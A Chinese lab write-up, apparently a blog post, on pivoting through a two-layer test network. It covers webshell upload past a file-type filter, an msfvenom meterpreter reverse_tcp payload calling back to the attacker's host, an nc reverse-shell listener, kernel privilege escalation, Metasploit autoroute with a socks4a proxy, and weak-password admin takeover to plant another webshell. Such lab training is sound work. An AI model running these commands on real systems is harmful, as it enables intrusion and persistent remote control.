实验目的:利用代理功能对2层网络进行渗透测试靶机  ubantu 192.168.31.207  192.168.1.129ubantu  192.168.1.100

首先访问192.168.31.207

一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将

改为
放包就上传成功了

菜刀连接文件地址

kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388

大马进行反弹shell

反弹成功
uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
成功获得一个会话连接
添加一个路由 run autoroute -s 192.168.1.0/24

本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
将设置的socks4添加进末尾
代理打开firefox

访问192.168.1.100
弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3

添加新文章上传php大马
直接拖拽成功上传后,可以查看路径,直接访问地址
由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,

socks4代理网络渗透测试实验相关推荐

  1. 网络渗透测试实验三 XSS和SQL

    网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...

  2. 网络渗透测试实验三——XSS和SQL注入

    网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...

  3. 三层网络渗透测试实验

    前言 在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢? 利用这个实验我们就可以更清晰的 ...

  4. 网络渗透测试实验二(网络扫描与网络侦察)

    实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 系统环境:Kali Linux 2.Windows 网 ...

  5. 网络渗透测试实验一 网络扫描与网络侦查

    实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 实验内容.原理 一.被动扫描 1.搜索麻省理工学院网站 ...

  6. GUET网络渗透测试实验报告1

    1.实验目的 理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步渗透工作打下基础. 2. 实验内容.原理 3. 实验过程 1.用搜索引 ...

  7. 网络渗透测试实验一 网络扫描与网络侦察

    目录 一.实验目的和要求 二.实验步骤 三.实验小结 一.实验目的和要求 实验目的:理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为下一步 ...

  8. 网络渗透测试实验——网络扫描与网络侦察

    目录 1. 实验目的和要求 2. 实验步骤 3. 实验小结 实验目的和要求        理解网络扫描.网络侦察的作用:通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎.扫描工具的应用,通过信息收集为 ...

  9. (超详细)XSS和SQL注入-网络渗透测试实验三

    文章目录 前言 实验目的 系统环境 网络环境 实验工具 XSS部分:利用Beef劫持被攻击者客户端浏览器. 实验环境搭建. 环境搭建参考网站 搭建IIS时踩的坑: 1.利用AWVS扫描留言簿网站,发现 ...

最新文章

  1. 嵌入式jetty的HTTP实现
  2. centos 6.5 安装 lamp 后mysql不能启动_CentOS 6.5系统安装配置LAMP(Apache+PHP5+MySQL)服务器环境...
  3. 减负提质的新命题下,网易云信如何为课后服务升级?
  4. python前端界面模板_Python编程flask使用页面模版的方法
  5. eclipse各个版本的区别
  6. Project: 项目经理新建资源预订
  7. git 如何删除缓存的远程分支列表
  8. Excle 常用函数
  9. karto探秘之open_karto 第一章 --- 数据结构与类的初始化
  10. JSON与对象之间的相互转换
  11. NVIDIA史上最大显卡质量事故,我正在用Vostro 1400
  12. 基于FPGA卡拉ok系统的设计--反馈抑制
  13. 焦点关注|创造中国奇迹:北京大兴国际机场的助力者
  14. Bugku-web-秋名山老司机
  15. 在vue中使用three.js创建一个简单的立体图形
  16. 小伙创业做奶茶,兢兢业业把奶茶店已经扩张到了10家分店
  17. flink 缓存问题处理过程,看我十八般武艺
  18. 如何更换荣耀MagicBook Pro开机启动logo
  19. win7怎么进入安全模式_win7进入安全模式教程
  20. html文件右键没有打开方式,Win7右键菜单中的”打开方式“不见了的解决方法

热门文章

  1. 修改ssh默认登录shell
  2. Linux下部署启动项目
  3. Barlow Twins:Self-Supervised Learning via Redundancy Reduction论文阅读
  4. 最新小白设置sublime默认浏览器以及快捷键
  5. .NET 学习-未将对象引用设置到对象的实例 解决方法
  6. ios 代码设置控件宽高比_IOS开发入门之iOS一套代码适配所有iPhone手机布局实现方案...
  7. google云端硬盘colab
  8. 电脑突然变成绿屏错误代码无法使用怎么办?
  9. 笔记本电脑开机,连着wifi无法上网的解决办法
  10. 乐鑫Esp32学习之旅16 学习本地语音唤醒离线识别框架 esp-skainet ,如何修改唤醒词? 如何自定义命令词?如何做意图动作?